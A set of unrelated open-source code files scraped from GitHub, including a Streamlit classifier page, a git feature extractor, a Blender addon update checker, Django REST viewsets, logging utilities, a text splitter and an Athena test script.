st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'Random Forest':
st.sidebar.subheader("Hyperparameters Tuning")
n_estimators = st.sidebar.number_input("The number of trees in the forest", 100, 5000, step=10,
key='n_estimators')
max_depth = st.sidebar.number_input(
"The maximum depth of the tree", 1, 20, step=1, key='max_depth')
bootstrap = st.sidebar.radio(
"Bootstrap samples when building trees", ('True', 'False'), key='bootstrap')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("Random Forest Results")
model = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth, bootstrap=bootstrap,
n_jobs=-1)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'GradientBoostingClassifier':
st.sidebar.subheader("Hyperparameters Tuning")
n_estimators = st.sidebar.number_input("n_estimators", 100, 5000, step=10,
key='n_estimators')
max_depth = st.sidebar.number_input(
"The maximum depth of the tree", 3, 15, step=1, key='max_depth')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("GradientBoostingClassifier Results")
model = GradientBoostingClassifier(
n_estimators=n_estimators, max_depth=max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'K-Nearest Neighbor':
st.sidebar.subheader("Hyperparameters Tuning")
criterion = st.sidebar.selectbox("criterion", ("gini", "entropy"))
n_neighbors = st.sidebar.number_input("Number of neighbors, K", 1, 428, step=1,
key='n_neighbors')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("K-Nearest Neighbor Results")
model = KNeighborsClassifier(n_neighbors=n_neighbors)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'Decision Tree':
st.sidebar.subheader("Hyperparameters Tuning")
max_depth = st.sidebar.number_input(
"The maximum depth of the tree", 2, 16, step=2, key='max_depth')
max_leaf_nodes = st.sidebar.number_input("Maximum leaf node", 2, 20, step=1,
key='max_leaf_nodes')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("Decision Tree Results")
model = DecisionTreeClassifier(max_leaf_nodes=max_leaf_nodes)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'Neural Network':
st.sidebar.subheader("Hyperparameters Tuning")
solver = st.sidebar.radio(
"Solver", ("lbfgs", "sgd", "adam"), key='solver')
alpha = st.sidebar.number_input(
"Regularization parameter", 0.000001, 10.0000, key='alpha')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("Neural Network Results")
scaler = StandardScaler()
scaler.fit(x_train)
X_train = scaler.transform(x_train)
X_test = scaler.transform(x_test)
model = MLPClassifier(solver=solver, alpha=alpha,
hidden_layer_sizes=(5, 2), random_state=1)
model.fit(X_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(X_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if st.sidebar.checkbox("Show raw data", False):
st.subheader("Adult Income Data Set (Classification)")
st.write(df)
if __name__ == '__main__':
write()
| mdsac1441/final_year_project | pages/LA/la_pages/MA/ma_pages/MT/mt.py | mt.py | py | 13,883 | python | en | code | 0 | github-code | 13 |
70336392018 | import numpy as np
from analyzer.record_type import RecordType
from analyzer.git_dao import *
# To speed up features obtaining better to keep them in numpy arrays.
# In this case we have to know size or record and position of features in vector before start to parse them.
class Features(object):
"""
Base class for features. All fields are features names.
Each field is 'int' type with index of related feature in record.
Should be extended with `__slots__ = Features.__slots__ + ('FOO',)`.
Vocabulary based features should have "V_" prefix.
"""
__slots__ = ('RC_ID',)
def __init__(self):
counter = 0
for slot in self.__slots__:
setattr(self, slot, counter)
counter += 1
def is_vocabulary_feature(feature_name: str) -> bool:
return feature_name.startswith("V_")
class RecordsProducer(object):
"""
Base class to parse specific set of features from git DAO-s.
Provides ability to keep features for one record in Numpy array of pre-known size, build template for such record
and set values into record array with `record[self.features.FOO] = bar` syntax.
Defining one feature takes constant time and doesn't depend (very) from amount of features.
Also it handles vocabulary-based features. See `add_vocabulary_feature_value` method.
To override. Keep in mind that amount of time required for analyzing very depends from this class implementation.
"""
__slots__ = ('record_type', 'features', 'features_number', 'vocabulary_features',)
def __init__(self, record_type: RecordType, features: Features):
self.record_type = record_type
self.features = features
self.features_number = len(features.__slots__)
self.vocabulary_features = np.empty(self.features_number, dtype=object)
self.vocabulary_features.fill(None)
def get_feature_names(self) -> list:
return [k for k in self.features.__slots__][1:] # First name - name of output class.
def get_row_container(self) -> np.ndarray:
"""
:return: Numpy array for one record with 0 value for all features.
"""
return np.zeros(self.features_number, dtype=np.int16)
def add_vocabulary_feature_value(self, feature: int, vocabulary_item: str, record: np.ndarray):
"""
Adds into inner 'vocabulary_features' numpy 2D array vocabulary feature.
:param feature: Feature index. Should has "V_" prefix.
:param vocabulary_item: Value from vocabulary.
:param record: Record to set feature value into.
"""
feature_vocabulary: dict = self.vocabulary_features[feature]
if feature_vocabulary is None:
feature_vocabulary = dict()
feature_vocabulary[vocabulary_item] = 0 # Index is 0 because dictionary has only one key.
self.vocabulary_features[feature] = feature_vocabulary
record[feature] = 0 # It is index in feature_vocabulary.
else:
item_index = feature_vocabulary.get(vocabulary_item)
if item_index is None: # No such item in vocabulary.
item_index = len(feature_vocabulary) # Dictionary is appended only so unique index = length.
feature_vocabulary[vocabulary_item] = item_index
record[feature] = item_index
@staticmethod
def check_binary_line(line: str) -> bool:
return "\x00" in line or any(ord(x) > 0x80 for x in line)
def analyze_git_file_recursively(self, file: GitFile, is_diff_hunk=False) -> list:
"""
Analyzes specified 'GitFile'. Returns list of numpy arrays-records.
Don't use 2D numpy array because need to append and extend list of records.
:param file: 'GitFile' to analyze.
:param is_diff_hunk: Flag that we are interested only in last line in first piece in file.
:return: List of numpy arrays with parsed records.
"""
records = []
file_level_features = self.analyze_git_file(file)
for piece in file.pieces:
piece_level_features = self.analyze_git_piece(file_level_features, piece)
# Set what to handle.
lines = piece.lines
if is_diff_hunk:
lines = lines[-1:]
# Handle chosen lines.
is_first_line = True
for line in lines:
if is_first_line:
is_first_line = False
if self.check_binary_line(line.line) is None:
break # Don't check binary files.
line_level_features = self.analyze_git_line(piece_level_features, line)
records.append(line_level_features) # Save features.
return records
# To override.
def analyze_git_file(self, file: GitFile) -> np.ndarray:
"""
Analyzes specified 'GitFile'.
:param file: 'GitFile' to parse.
:return: 1D numpy array with parsed record.
"""
return self.features_keeper.get_row_container()
# To override.
def analyze_git_piece(self, file_level_features, piece: GitPiece) -> np.ndarray:
"""
Analyzes specified 'GitPiece'.
:param file_level_features: Numpy 1D array of already analyzed features.
:param piece: 'GitPiece' to parse.
:return: 1D numpy array with parsed record.
"""
return np.copy(file_level_features)
# To override.
def analyze_git_line(self, piece_level_features, line: GitLine) -> np.ndarray:
"""
Analyzes specified 'GitLine'.
:param piece_level_features: Numpy 1D array of already analyzed features.
:param line: 'GitLine' to parse.
:return: 1D numpy array with parsed record.
"""
return np.copy(piece_level_features)
| AlexanderMakarov/GitHubParser | analyzer/records_producer.py | records_producer.py | py | 5,828 | python | en | code | 0 | github-code | 13 |
21675820972 | """
단순한 구현문제이다.
방향 전환과 전진을 하면서 각 좌표의 최대 최소를 구해 가로 길이와
세로 길이를 구해 넓이를 계산한다.
문제를 제대로 읽지 않아 계속적인 실수가 발생했다.
문제를 좀 더 꼼꼼히 읽는 습관을 들이자.
"""
import sys
input = sys.stdin.readline
dx = [-1, 0, 1, 0]
dy = [0, 1, 0, -1]
for i in range(int(input())):
storeX, storeY = [0], [0]
d, cx, cy = 0, 0, 0
for cmd in list(input().rstrip()):
if cmd == 'F':
cx, cy = cx+dx[d], cy+dy[d]
storeX.append(cx)
storeY.append(cy)
elif cmd == 'B':
cx, cy = cx-dx[d], cy-dy[d]
storeX.append(cx)
storeY.append(cy)
elif cmd == 'L':
d = (d-1)%4
else:
d = (d+1)%4
print((max(storeX)-min(storeX))*(max(storeY)-min(storeY))) | SangHyunGil/Algorithm | Baekjoon/baekjoon_8911(simulation).py | baekjoon_8911(simulation).py | py | 911 | python | ko | code | 0 | github-code | 13 |
42970382934 | import bpy
import json
import re
import requests
class ExperimentalUpdateCheck:
"""Get release information over an API and convert it into data that can be used by Super Addon Manager."""
def __init__(self, bl_info: dict) -> None:
api, user_name, repo_name = self.get_user_and_repo(bl_info)
self.api: str = api
self.user_name: str = user_name
self.repo_name: str = repo_name
def get_user_and_repo(self, bl_info: dict) -> tuple:
"""Try to get the API type, user name and repository name from the bl_info."""
# Get the three urls that might be included in the bl_info.
urls = [bl_info.get("doc_url", ""), bl_info.get(
"wiki_url", ""), bl_info.get("tracker_url", "")]
api = None
user_name: str = ""
repo_name: str = ""
for u in urls:
# Search for a GitHub or GitLab Url.
# Both Urls have the scheme https://github.com/user/repo
match = re.search(
"(git(?:hub|lab)).com/([a-zA-Z0-9_-]+)/([a-zA-Z0-9_-]+)", u)
if match == None:
continue
api, user_name, repo_name = match.groups()
api = api.upper() # Convert the API to Uppercase for further use.
return api, user_name, repo_name
def get_data(self) -> dict:
"""Get the data in the form of an endpoint using either GitHubs or GitLabs API."""
# Get the preferences of Super Addon Manager.
prefs = bpy.context.preferences.addons[__package__.split(".")[
0]].preferences
# Don't try to get any data, if no API is specified.
if not self.api:
return
if self.api == "GITHUB":
return self._get_github_data(prefs.use_experimental_installer)
if self.api == "GITLAB":
return self._get_gitlab_data(prefs.use_experimental_installer)
return
def _get_github_data(self, allow_automatic_download: bool) -> dict:
"""Request the necessary data from the GitHub API."""
# Get the data from the GitHub releases API.
res = requests.get(
f"https://api.github.com/repos/{self.user_name}/{self.repo_name}/releases")
if not res.ok:
return # ! Critical error
data = json.loads(res.text)
endpoint_data = {
"schema_version": "super-addon-manager-version-info-1.0.0",
"versions": []
}
# Iterate over the API data to convert it into data that can be used by Super Addon Manager.
for d in data:
d: dict
# Skip unreleased versions.
if d.get("draft", True) or d.get("prerelease", True):
print("Skipping - Draft or Prerelease")
continue
# Get the version number and the download url.
version_string = d.get("tag_name", "")
download_url = d.get("html_url", "")
if allow_automatic_download:
download_url = f"https://github.com/{self.user_name}/{self.repo_name}/archive/refs/tags/{version_string}.zip"
# Skip versions without version number or download url.
if version_string == "" or download_url == "":
continue
version_array = self.get_version_array(version_string)
if len(version_array) != 3:
return # ! Critical error
# Add version to the endpoint data.
endpoint_data["versions"].append({
"version": list(version_array),
"download_url": download_url,
"allow_automatic_download": allow_automatic_download,
"minimum_blender_version": list(self.pad_tuple(bpy.app.version)),
"release_description": d.get("body", ""),
})
return endpoint_data
def _get_gitlab_data(self, allow_automatic_download: bool) -> dict:
"""Request the necessary data from the GitLab API."""
# Request the data from the GitLab Users API to find out the project ID.
res = requests.get(
f"https://gitlab.com/api/v4/users/{self.user_name}/projects?simple=true")
if not res.ok:
return # ! Critical error
projects = json.loads(res.text)
# Iterate over all user projects and compare the name to get the project ID.
# This is necessary in order to get information on releases.
project_id = ""
for p in projects:
if p["name"] == self.repo_name:
project_id = p["id"]
break
# Get the data from the GitLab releases API.
res = requests.get(
f"https://gitlab.com/api/v4/projects/{project_id}/releases")
if not res.ok:
return # ! Critical error
data = json.loads(res.text)
endpoint_data = {
"schema_version": "super-addon-manager-1.0.0", "versions": []}
for d in data:
d: dict
# Skip unreleased versions.
if d.get("upcoming_release", True):
continue
# Get the version number and the download url.
version_string = d.get("tag_name", "")
download_url = d.get("_links", {"self": ""}).get("self", "")
if allow_automatic_download:
assets = d.get("assets", {"sources": []}).get("sources", [])
# Iterate over all assets to get the url of the Zip-File.
for a in assets:
if a.get("format", "") == "zip":
if a.get("url", None):
download_url = a.get("url", "")
# Skip versions without version number or download url.
if version_string == "" or download_url == "":
continue
version_array = self.get_version_array(version_string)
if len(version_array) != 3:
return # ! Critical Error
# Add version to the endpoint data.
endpoint_data["versions"].append({
"version": list(version_array),
"download_url": download_url,
"allow_automatic_download": allow_automatic_download,
"minimum_blender_version": list(self.pad_tuple(bpy.app.version)),
"release_description": d.get("description", ""),
})
return endpoint_data
def get_version_array(self, version_string) -> list:
"""Extract a version number array from a tag name."""
# Search for a number with one to three parts, e.g. v1, 2.4 or version1.36.0
version_number = re.search("((?:\d+[\._-]){0,2}\d+)", version_string)
# Return an empty array, if no version number can be found.
if not version_number:
return []
try:
version_number = re.sub("[\._-]+", ".", version_number.group(0))
# Try to convert the version number to a list of length 3.
version_array = self.pad_tuple(
version_number.split("."))
return list(version_array)
except ValueError:
return []
def pad_tuple(self, t) -> tuple:
"""Convert a list into a tuple of three integers."""
# Convert all raw values to integers, to avoid issues, when comparing versions
def type_convert(x):
allowed_types = [int, float, str]
if type(x) in allowed_types:
return int(x)
raise ValueError
t = map(type_convert, t)
return (tuple(t) + (0, 0, 0))[:3]
| PidgeonTools/SuperAddonManager | objects/experimental_update_check.py | experimental_update_check.py | py | 7,646 | python | en | code | 2 | github-code | 13 |
5308155516 | class Solution(object):
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
length = len(s)
ans = 0
i = 0
map_char = {}
for j in range(length):
if s[j] in map_char:
i = max(map_char[s[j]], i)
ans = max(ans, j - i + 1)
map_char[s[j]] = j + 1
return ans
| Nrgeup/Algorithm-practice | leetcode/3.py | 3.py | py | 413 | python | en | code | 0 | github-code | 13 |
7830627880 | from django.db.models import Exists, OuterRef, Prefetch
from rest_framework import viewsets
from cl.api.pagination import TinyAdjustablePagination
from cl.api.utils import LoggingMixin, RECAPUsersReadOnly
from cl.disclosures.models import FinancialDisclosure
from cl.people_db.api_serializers import (
ABARatingSerializer,
AttorneySerializer,
EducationSerializer,
PartySerializer,
PersonDisclosureSerializer,
PersonSerializer,
PoliticalAffiliationSerializer,
PositionSerializer,
RetentionEventSerializer,
SchoolSerializer,
SourceSerializer,
)
from cl.people_db.filters import (
ABARatingFilter,
AttorneyFilter,
EducationFilter,
PartyFilter,
PersonDisclosureFilter,
PersonFilter,
PoliticalAffiliationFilter,
PositionFilter,
RetentionEventFilter,
SchoolFilter,
SourceFilter,
)
from cl.people_db.models import (
ABARating,
Attorney,
Education,
Party,
Person,
PoliticalAffiliation,
Position,
RetentionEvent,
School,
Source,
)
class PersonDisclosureViewSet(viewsets.ModelViewSet):
queryset = (
Person.objects.filter(
# Only return people that have disclosure sub-objects
Exists(
FinancialDisclosure.objects.filter(
person=OuterRef("pk"),
).only("pk")
),
# Don't include aliases
is_alias_of=None,
)
.prefetch_related(
# Prefetch disclosures and positions to avoid query floods
Prefetch(
"financial_disclosures",
queryset=FinancialDisclosure.objects.all()
.only("year", "id", "person_id")
.order_by("-year"),
to_attr="disclosures",
),
Prefetch(
"positions",
queryset=Position.objects.filter(court__isnull=False)
.select_related("court")
.only("pk", "court_id", "person_id")
.order_by("-date_start"),
to_attr="court_positions",
),
)
.only(
"name_first",
"name_middle",
"name_last",
"name_suffix",
"has_photo",
"date_dob",
"date_granularity_dob",
"slug",
)
.order_by("-id")
)
serializer_class = PersonDisclosureSerializer
filterset_class = PersonDisclosureFilter
pagination_class = TinyAdjustablePagination
ordering_fields = (
"id",
"date_created",
"date_modified",
"name_last",
)
class PersonViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = (
Person.objects.all()
.prefetch_related(
"positions",
"educations",
"political_affiliations",
"sources",
"aba_ratings",
"race",
)
.order_by("-id")
)
serializer_class = PersonSerializer
filterset_class = PersonFilter
ordering_fields = (
"id",
"date_created",
"date_modified",
"date_dob",
"date_dod",
"name_last",
)
class PositionViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = Position.objects.all().order_by("-id")
serializer_class = PositionSerializer
filterset_class = PositionFilter
ordering_fields = (
"id",
"date_created",
"date_modified",
"date_nominated",
"date_elected",
"date_recess_appointment",
"date_referred_to_judicial_committee",
"date_judicial_committee_action",
"date_hearing",
"date_confirmation",
"date_start",
"date_retirement",
"date_termination",
)
class RetentionEventViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = RetentionEvent.objects.all().order_by("-id")
serializer_class = RetentionEventSerializer
filterset_class = RetentionEventFilter
ordering_fields = ("id", "date_created", "date_modified", "date_retention")
class EducationViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = Education.objects.all().order_by("-id")
serializer_class = EducationSerializer
filterset_class = EducationFilter
ordering_fields = ("id", "date_created", "date_modified")
class SchoolViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = School.objects.all().order_by("-id")
serializer_class = SchoolSerializer
filterset_class = SchoolFilter
ordering_fields = ("id", "date_created", "date_modified", "name")
class PoliticalAffiliationViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = PoliticalAffiliation.objects.all().order_by("-id")
serializer_class = PoliticalAffiliationSerializer
filterset_class = PoliticalAffiliationFilter
ordering_fields = (
"id",
"date_created",
"date_modified",
"date_start",
"date_end",
)
class SourceViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = Source.objects.all().order_by("-id")
serializer_class = SourceSerializer
filterset_class = SourceFilter
ordering_fields = (
"id",
"date_modified",
"date_accessed",
)
class ABARatingViewSet(LoggingMixin, viewsets.ModelViewSet):
queryset = ABARating.objects.all().order_by("-id")
serializer_class = ABARatingSerializer
filterset_class = ABARatingFilter
ordering_fields = (
"id",
"date_created",
"date_modified",
"year_rated",
)
class PartyViewSet(LoggingMixin, viewsets.ModelViewSet):
permission_classes = (RECAPUsersReadOnly,)
serializer_class = PartySerializer
filterset_class = PartyFilter
ordering_fields = (
"id",
"date_created",
"date_modified",
)
queryset = Party.objects.prefetch_related(
"party_types__criminal_counts",
"party_types__criminal_complaints",
"roles",
).order_by("-id")
class AttorneyViewSet(LoggingMixin, viewsets.ModelViewSet):
permission_classes = (RECAPUsersReadOnly,)
serializer_class = AttorneySerializer
filterset_class = AttorneyFilter
ordering_fields = (
"id",
"date_created",
"date_modified",
)
queryset = Attorney.objects.prefetch_related("roles").order_by("-id")
| freelawproject/courtlistener | cl/people_db/api_views.py | api_views.py | py | 6,404 | python | en | code | 435 | github-code | 13 |
22236145386 | from pathlib import Path
import collections
import colorlog
import copy
import logging
import sys
import numpy as np
LOG_FORMAT_STR = '%(asctime)s.%(msecs)03d %(levelname)-8s [%(filename)s:%(lineno) 5d] %(message)s'
LOG_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'
LOG_COLORS = {
'DEBUG': 'green',
'INFO': 'cyan',
'WARNING': 'bold_yellow',
'ERROR': 'bold_red',
'CRITICAL': 'bold_purple'}
class Bunch(dict):
"""A subclass of dictionary with an additional dot syntax."""
def __init__(self, *args, **kwargs):
super(Bunch, self).__init__(*args, **kwargs)
self.__dict__ = self
def copy(self, deep=False):
"""Return a new Bunch instance which is a copy of the current Bunch instance.
Parameters
----------
deep : bool
If True perform a deep copy (see notes). By default a shallow copy is returned.
Returns
-------
Bunch
A new copy of the Bunch.
Notes
-----
- A shallow copy constructs a new Bunch object and then (to the extent possible) inserts
references into it to the objects found in the original.
- A deep copy constructs a new Bunch and then, recursively, inserts copies into it of the
objects found in the original.
"""
return copy.deepcopy(self) if deep else Bunch(super(Bunch, self).copy())
def save(self, npz_file, compress=False):
"""
Saves a npz file containing the arrays of the bunch.
:param npz_file: output file
:param compress: bool (False) use compression
:return: None
"""
if compress:
np.savez_compressed(npz_file, **self)
else:
np.savez(npz_file, **self)
@staticmethod
def load(npz_file):
"""
Loads a npz file containing the arrays of the bunch.
:param npz_file: output file
:return: Bunch
"""
if not Path(npz_file).exists():
raise FileNotFoundError(f"{npz_file}")
return Bunch(np.load(npz_file))
def _iflatten(x):
result = []
for el in x:
if isinstance(el, collections.abc.Iterable) and not (
isinstance(el, str) or isinstance(el, dict)):
result.extend(_iflatten(el))
else:
result.append(el)
return result
def _gflatten(x):
def iselement(e):
return not (isinstance(e, collections.abc.Iterable) and not (
isinstance(el, str) or isinstance(el, dict)))
for el in x:
if iselement(el):
yield el
else:
yield from _gflatten(el)
def flatten(x, generator=False):
"""
Flatten a nested Iterable excluding strings and dicts.
Converts nested Iterable into flat list. Will not iterate through strings or
dicts.
:return: Flattened list or generator object.
:rtype: list or generator
"""
return _gflatten(x) if generator else _iflatten(x)
def range_str(values: iter) -> str:
"""
Given a list of integers, returns a terse string expressing the unique values.
Example:
indices = [0, 1, 2, 3, 4, 7, 8, 11, 15, 20]
range_str(indices)
>> '0-4, 7-8, 11, 15 & 20'
:param values: An iterable of ints
:return: A string of unique value ranges
"""
trial_str = ''
values = list(set(values))
for i in range(len(values)):
if i == 0:
trial_str += str(values[i])
elif values[i] - (values[i - 1]) == 1:
if i == len(values) - 1 or values[i + 1] - values[i] > 1:
trial_str += f'-{values[i]}'
else:
trial_str += f', {values[i]}'
# Replace final comma with an ampersand
k = trial_str.rfind(',')
if k > -1:
trial_str = f'{trial_str[:k]} &{trial_str[k + 1:]}'
return trial_str
def setup_logger(name='ibl', level=logging.NOTSET, file=None, no_color=False):
"""Set up a log for IBL packages.
Uses date time, calling function and distinct colours for levels.
Sets the name if not set already and add a stream handler.
If the stream handler already exists, does not duplicate.
The naming/level allows not to interfere with third-party libraries when setting level.
Parameters
----------
name : str
Log name, should be set to the root package name for consistent logging throughout the app.
level : str, int
The logging level (defaults to NOTSET, which inherits the parent log level)
file : bool, str, pathlib.Path
If True, a file handler is added with the default file location, otherwise a log file path
may be passed.
no_color : bool
If true the colour log is deactivated. May be useful when directing the std out to a file.
Returns
-------
logging.Logger, logging.RootLogger
The configured log.
"""
log = logging.getLogger() if not name else logging.getLogger(name)
log.setLevel(level)
fkwargs = {'no_color': True} if no_color else {'log_colors': LOG_COLORS}
# check existence of stream handlers before adding another
if not any(map(lambda x: x.name == f'{name}_auto', log.handlers)):
# need to remove any previous default Stream handler configured on stderr
# to not duplicate output
for h in log.handlers:
if h.stream.name == '<stderr>' and h.level == 0 and h.name is None:
log.removeHandler(h)
stream_handler = logging.StreamHandler(stream=sys.stdout)
stream_handler.setFormatter(
colorlog.ColoredFormatter('%(log_color)s' + LOG_FORMAT_STR,
LOG_DATE_FORMAT, **fkwargs))
stream_handler.name = f'{name}_auto'
log.addHandler(stream_handler)
# add the file handler if requested, but check for duplicates
if not any(map(lambda x: x.name == f'{name}_file', log.handlers)):
if file is True:
log_to_file(log=name)
elif file:
log_to_file(filename=file, log=name)
return log
def log_to_file(log='ibl', filename=None):
"""
Save log information to a given filename in '.ibl_logs' folder (in home directory).
Parameters
----------
log : str, logging.Logger
The log (name or object) to add file handler to.
filename : str, Pathlib.Path
The name of the log file to save to.
Returns
-------
logging.Logger
The log with the file handler attached.
"""
if isinstance(log, str):
log = logging.getLogger(log)
if filename is None:
filename = Path.home().joinpath('.ibl_logs', log.name)
elif not Path(filename).is_absolute():
filename = Path.home().joinpath('.ibl_logs', filename)
filename.parent.mkdir(exist_ok=True)
file_handler = logging.FileHandler(filename)
file_format = logging.Formatter(LOG_FORMAT_STR, LOG_DATE_FORMAT)
file_handler.setFormatter(file_format)
file_handler.name = f'{log.name}_file'
log.addHandler(file_handler)
log.info(f'File log initiated {file_handler.name}')
return log
| int-brain-lab/iblutil | iblutil/util.py | util.py | py | 7,115 | python | en | code | 0 | github-code | 13 |
6590126316 | # nongenlog.py
#
# 计算在Apache日志文件中传输的总字节数
# 使用简单的for-loop计算Apache服务器日志中传输的字节数。不使用生成器。
import time
# 计时
time_start = time.clock()
wwwlog = open("big-access-log")
total = 0
for line in wwwlog:
'''
语法
str.split(str="", num=string.count(str)).
参数
str -- 分隔符,默认为所有的空字符,包括空格、换行(\n)、制表符(\t)等。
num -- 分割次数。
返回值
返回分割后的字符串列表。
'''
bytestr = line.rsplit(None, 1)[1] # 以空字符分割字符串1次,得到的列表取第二个元素,代表每次请求的传输字节数
if bytestr != '-':
total += int(bytestr)
# 计时
time_end = time.clock()
time_cost = time_end - time_start
print("共计 %d Bytes | 共计耗时 %s s" % (total, time_cost))
| lazzman/PythonLearn | Python3_Learn/生成器与协程专题[www.dabeaz.com]/生成器/generators_py3/2 Processing Data Files/nongenlog.py | nongenlog.py | py | 901 | python | zh | code | 4 | github-code | 13 |
3836827733 | def show_magicians(magicians):
"""Prints a list of magician's names."""
for magician in magicians:
print(magician)
def make_great(magicians):
"""Adds "the Great" to the end of each magician's name."""
great_magicians = []
while magicians:
magician = magicians.pop()
great_magician = magician + ' the Great'
great_magicians.append(great_magician)
for great_magician in great_magicians:
magicians.append(great_magician)
magicians = ['Harry Houdini', 'David Copperfield', 'David Blaine']
show_magicians(magicians)
print("\n")
make_great(magicians)
show_magicians(magicians)
| jodr5786/Python-Crash-Course | Chapter 8/8-10_Great_Magicians.py | 8-10_Great_Magicians.py | py | 677 | python | en | code | 0 | github-code | 13 |
41513320121 | #!/usr/bin/env python3
from pathlib import Path
import pathlib
import tempfile
def print_mult(x, MAX):
cont = 0
arr = set()
for i in range(2, x+1):
if(x % i == 0):
cont += 1
arr.add(i)
if(cont > MAX):
break
print(arr)
return
def partitions(reading_stream, select, ftmp, totlines):
# looking how many lines are
for line in reading_stream:
if(select == 'y' and not(line.isspace())):
ftmp.write(line)
totlines += 1
elif(select == 'n'):
totlines += 1
if(select == 'y'):
ftmp.seek(0, 0)
MAX = 15 # maximum number of suggested partitions
print("Found " + str(totlines) + " lines.")
print("\nHere you are some suggested legit partition size\\s to use: ")
print_mult(totlines, MAX)
part = int(input("\nIn how many partitions do you want to split the file? "))
if(part > totlines != 0):
print("Error: partitions greater than totlines!")
quit()
if(totlines % part != 0):
print("Error: partitions number has to be a multiple of your total file lines!")
quit()
return part, totlines
def inputf():
print("Remember to add file extension (.log, .txt..) ")
src_filename = input("file name: ")
reading_stream = open(src_filename, "r")
select = input(
"Would you like to exclude whitespaces\\whitelines?\nSuggested 'y'\n[y\\n] ")
if(not(select == 'y' or select == 'n')):
print("Error")
quit()
path = str(pathlib.Path().parent.absolute()) + "/" + src_filename
noext_filename = Path(path).resolve().stem
ext = str(pathlib.Path(src_filename).suffix)
if(select == 'y'):
ftmp = tempfile.TemporaryFile(mode='w+')
return select, reading_stream, noext_filename, ext, ftmp
else:
return select, reading_stream, noext_filename, ext, False
def main():
select, reading_stream, noext_filename, ext, ftmp = inputf()
part, totlines = partitions(reading_stream, select, ftmp, 0)
cont = 1
reading_stream.seek(0, 0)
if(select == 'y'):
ftmp.seek(0, 0)
linestoprint = int(totlines / part)
for cont in range(1, part+1):
f = open(noext_filename + "-part-" + str(cont) + ext, "w")
while (k<linestoprint):
progress = float((cont) / part) * 100
if(select == 'n'):
line = str(reading_stream.readline())
f.write(line)
else:
line = str(ftmp.readline())
f.write(line)
print("Progress: " + "%2.f" % progress + "%")
k+=1
f.close()
k = 0
reading_stream.close()
if(select == 'y'):
ftmp.close()
return
if(__name__ == "__main__"):
main()
| mich2k/Text-Splitter | textsplitter.py | textsplitter.py | py | 2,821 | python | en | code | 1 | github-code | 13 |
38167656932 | #!/usr/bin/python
# -*- coding:utf-8 -*-
#冒泡排序法
import numpy as np
def bubble_sort(list):
count = len(list)
for i in range(0, count):
for j in range(i+1, count):
if list[i] > list[j]:
list[i], list[j] = list[j], list[i]
return list
test = np.array([2, 1, 6, 3, 9, 6, 0])
print(bubble_sort(test))
| Funail/webdriver | python_study/bubble_sort.py | bubble_sort.py | py | 357 | python | en | code | 0 | github-code | 13 |
5497055572 | from athena_helper import AthenaQuery
import boto3
import logging
# We can only really do an integration test of this
LOGGER = logging.getLogger()
def set_up_logging():
global LOGGER
output_handler = logging.StreamHandler()
output_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
output_handler.setFormatter(formatter)
LOGGER.addHandler(output_handler)
LOGGER.setLevel(logging.DEBUG)
# SILENCE!
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def main():
set_up_logging()
LOGGER.debug("Begin test")
boto_session = boto3.Session()
# This is the default table
query = "select * from elb_logs limit 1"
database_name = "sampledb"
# Build the name of the default Athena bucket
account_id = boto_session.client('sts').get_caller_identity().get('Account')
region = boto_session.region_name
result_bucket = "s3://aws-athena-query-results-{}-{}/".format(account_id, region)
